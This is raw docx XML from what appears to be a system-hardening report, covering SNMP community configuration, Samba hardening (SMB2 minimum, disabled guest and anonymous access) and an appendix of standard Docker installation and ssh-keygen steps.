                <w:szCs w:val="20"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">$eCur!ty$tr1ng</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> default -V systemonly</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000154">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rocommunity6 </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">$eCur!ty$tr1ng</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> default -V systemonly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000155">
      <w:pPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_44i2m8kef1e" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.7. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000157">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The hardening of Samba is shown in this section. First, we use Server Message Block (SMB) version 2 instead of 1, as version 2 patches multiple security vulnerabilities in version 1. The additional configuration is shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000158">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table9"/>
        <w:tblW w:w="861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10"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8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server string is the equivalent of the NT Description field</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server string = %h server (Samba, Ubuntu)</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color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pP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color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">min protocol = SMB2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Additionally, by default, Samba permits guest access to the file share without a username or password, as well as anonymous access, where users do not need to provide authentication information. This is disabled and limited in the commands below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table10"/>
        <w:tblW w:w="865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55"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>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color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># This option controls how unsuccessful authentication attempts are mapped</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color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># to anonymous connections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color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">   #map to guest = bad user</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color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pP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color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">map to guest = never</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color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">   restrict anonymous = 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000164">
      <w:pPr>
        <w:r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rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2lhbrqqw8jno" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Software Source Codes / Appendix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000166">
      <w:pPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The following source codes and commands were used to help illustrate the various steps in the report. The steps here correspond to where each command was used in its respective sections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000167">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000168">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b3awfjli8qeg" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Installing Docker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig. 2 Successful installation of docker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="3474017"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="19"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029200" cy="3474017"/>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b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 / 7:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table11"/>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color w:val="434343"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo apt-get update</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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00" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 / 7:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table12"/>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color w:val="434343"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo apt-get install ca-certificates curl gnupg</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 / 7:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table13"/>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sudo install -m </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="d19a66"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0755</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> -d /etc/apt/keyrings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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480" w:lineRule="auto"/>
        <w:ind w:left="72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00" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> / 7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table14"/>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curl -fsSL https://download.docker.com/linux/ubuntu/gpg </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="abb2bf"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">|</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000180">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 / 7:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table15"/>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color w:val="434343"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo chmod a+r /etc/apt/keyrings/docker.gpg</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000185">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6 / 7:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table16"/>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echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu $(. /etc/os-release &amp;&amp; echo "$VERSION_CODENAME") stable" | sudo tee /etc/apt/sources.list.d/docker.list &gt; /dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 7 / 7:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table17"/>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sudo apt-get update</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table18"/>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sudo apt-get install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000194">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table19"/>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sudo docker run hello-world</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000199">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ohj9jdbfjntm" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1fv3v4qvupuw" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>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3"/>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tk67ywkceexh" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Generating an SSH Private Key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 / 2:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table20"/>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su dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table21"/>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ssh-keygen</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A3">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A4">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Generating public/private rsa key pair.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A5">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Enter file in which to save the key (/home/dev/.ssh/id_rsa):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A6">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Created directory '/home/dev/.ssh'.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A7">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Enter passphrase (empty for no passphrase):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A8">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Enter same passphrase again:</w:t>
